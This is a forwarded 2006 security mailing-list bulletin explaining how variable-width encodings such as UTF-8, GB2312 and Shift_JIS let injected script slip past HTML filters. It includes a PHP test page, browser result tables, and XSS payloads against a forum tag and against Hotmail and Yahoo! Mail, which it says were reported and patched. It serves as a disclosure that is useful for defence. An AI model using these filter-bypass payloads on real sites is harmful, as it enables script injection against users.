Thread-topic: [NEWS] Bypassing Script Filters with Variable-Width Encodings
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Sunday, August 13, 2006 8:22 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Bypassing Script Filters with Variable-Width Encodings
>
>
>
>
> Bypassing Script Filters with Variable-Width Encodings
>
>
>
> We've all known that the main problem of constructing XSS
> attacks is how to obfuscate malicious code. In the following
> paragraphs Cheng will attempt to explain the concept of
> bypassing script filters with variable-width encodings, and
> disclose the applications of this concept to Hotmail and
> Yahoo! Mail web-based mail services.
>
>
> A variable-width encoding(a.k.a variable-length encoding) is
> a type of character encoding scheme in which codes of
> differing lengths are used to encode a character set. Most
> common variable-width encodings are multibyte encodings,
> which use varying numbers of bytes to encode different
> characters. The first use of multibyte encodings was for the
> encoding of Chinese, Japanese and Korean, which have large
> character sets well in excess of 256 characters. The Unicode
> standard has two variable-width encodings: UTF-8 and UTF-16.
> The most commonly-used codes are two-byte codes. The EUC-CN
> form of GB2312, plus EUC-JP and EUC-KR, are examples of such
> two-byte EUC codes. And there are also some three-byte and
> four-byte codes.
>
> Example and Discussion:
> The following is a php file from which Cheng will start to
> introduce his idea.
>
> <html>
> <head>
> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
> </head>
> <body>
> <?
>
> for($i=0;$i<256;$i++){
> echo "Char $i is <font face=\"xyz".chr($i)."\">not </font>"
> ."<font face=\" onmouseover=alert($i) notexist=".chr($i)."\" >"
> // NOTE: 5 space characters following the last \"
> ."available</font>\r\n\r\n<br>\r\n\r\n";
> }
>
> ?>
> </body>
> </html>
>
> For most values of $i, Internet Explorer 6.0(SP2) will
> display "Char XXX is not available". When $i is between
> 192(0xC0) and 255(0xFF), you can see "Char XXX is available".
> Let's take $i=0xC0 for example, consider the following code:
>
> Char 192 is <font face="xyz[0xC0]">not </font><font face="
> onmouseover=alert(192) s=[0xC0]" >available</font>
>
> 0xC0 is one of the 32 first bytes of 2-byte sequences
> (0xC0-0xDF) in UTF-8. So when IE parses the above code, it
> will consider 0xC0 and the following quote as a sequence, and
> therefore these two pairs of FONT elements will become one
> with "xyz[0xC0]">not </font><font face=" as the value of FACE
> parameter. The second 0xC0 will start another 2-byte sequence
> as a value of NOTEXIST parameter which is not quoted. Due to
> a space character following by the quote, 0xE0-0xEF which are
> first bytes of 3-byte sequences, together with the following
> quote and one space character will be considered as the value
> of NOTEXIST parameter. And each of the first bytes of 4-byte
> sequences(0xF0-0xF7), 5-byte sequences(0xF8-0xFB), 6-byte
> sequences(0xFC-0xFD), together with the following quote and
> space characters will be considered as one sequence.
>
> Here are the results of the above code parsed by Internet
> Explorer 6.0(SP2), Firefox 1.5.0.6 and Opera 9.0.1 in
> different variable-width encodings respectively. Note that
> the numbers in the table are the ranges of "available" characters.
>
>
> +-----------+-----------+-----------+-----------+
>
>
> | | IE | FF | OP |
>
>
> +-----------+-----------+-----------+-----------+
>
>
> | UTF-8 | 0xC0-0xFF | none | none |
>
>
> +-----------+-----------+-----------+-----------+
>
>
> | GB2312 | 0x81-0xFE | none | 0x81-0xFE |
>
>
> +-----------+-----------+-----------+-----------+
>
>
> | GB18030 | none | none | 0x81-0xFE |
>
>
> +-----------+-----------+-----------+-----------+
>
>
> | BIG5 | 0x81-0xFE | none | 0x81-0xFE |
>
>
> +-----------+-----------+-----------+-----------+
>
>
> | EUC-KR | 0x81-0xFE | none | 0x81-0xFE |
>
>
> +-----------+-----------+-----------+-----------+
>
>
> | EUC-JP | 0x81-0x8D | 0x8F | 0x8E |
>
>
> | | 0x8F-0x9F | | 0x8F |
>
>
> | | 0xA1-0xFE | | 0xA1-0xFE |
>
>
> +-----------+-----------+-----------+-----------+
>
>
> | SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
>
>
> | | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |
>
>
> +-----------+-----------+-----------+-----------+
>
>
> Application:
> Cheng doesn't think there is a typical exploitation of
> bypassing script filters with variable-width encodings,
> because the exploitation is very flexible. But you just need
> to remember that if the webapp use variable-width encodings,
> you can bury some characters following by your entry, and the
> buried characters might be very crucial.
>
> The above code might be exploited in general webapps which
> allow you to add formatting to your entry in the same way as
> HTML does. For example, in some forums, [font=Courier
> New]message[/font] in your message will be transformed into
> <font face="Courier New">message</font>. Supposing it use
> UTF-8, we can attack by sending
>
> [font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()
> s=[0xC0]]exploited[/font]
>
> And it will be tranformed into
>
> <font face="xyz[0xC0]">buried</font><font face="abc
> onmouseover=alert() s=[0xC0]">exploited</font>
>
> Again, the exploitation is very flexible, this FONT-FONT
> example is just an enlightening one. The following
> exploitation to Yahoo! Mail is quite different from this one.
>
> Disclosure:
> Using this method, Cheng has found two XSS vulnerabilities in
> Hotmail and Yahoo! Mail web-based mail services. Cheng has
> informed Yahoo and Microsoft on April 30 and May 12
> respectively. And they have patched the vulnerabilities.
>
> Yahoo! Mail XSS:
> Before Cheng discovered this vulnerability, Yahoo! Mail
> filtering engine could block "expression()" syntax in a CSS
> attribute using a comment to break up expression( expr/*
> */ession() ). I used [0x81] with the following asterisk to
> make a sequence, so that the second */ would close the
> comment. But the filtering engine considered the first two
> comment symbol as a pair.
>
> MIME-Version: 1.0
> From: user<user@xxxxxxxx>
> Content-Type: text/html; charset=GB2312
> Subject: example
>
> <span style='width:expr/*[0x81]*/*/ession(alert())'>exploited</span>
>
> Hotmail XSS:
> This exploitation is almost the same as the example.php.
>
> MIME-Version: 1.0
> From: user<user@xxxxxxxx>
> Content-Type: text/html; charset=SHIFT_JIS
> Subject: example
>
> <font face="[0x81]"></font><font face=" onmouseover=alert()
> s=[0x81]">exploited</font>
>
>
> Additional Information:
> The information has been provided by Cheng Peng Su
> <mailto:applesoup@xxxxxxxxx> .
> The original article can be found at:
> http://applesoup.googlepages.com/bypass_filter.txt
>
>
> ==============================================================
> ==================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ==============================================================
> ==================
> ==============================================================
> ==================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
>
>
>
>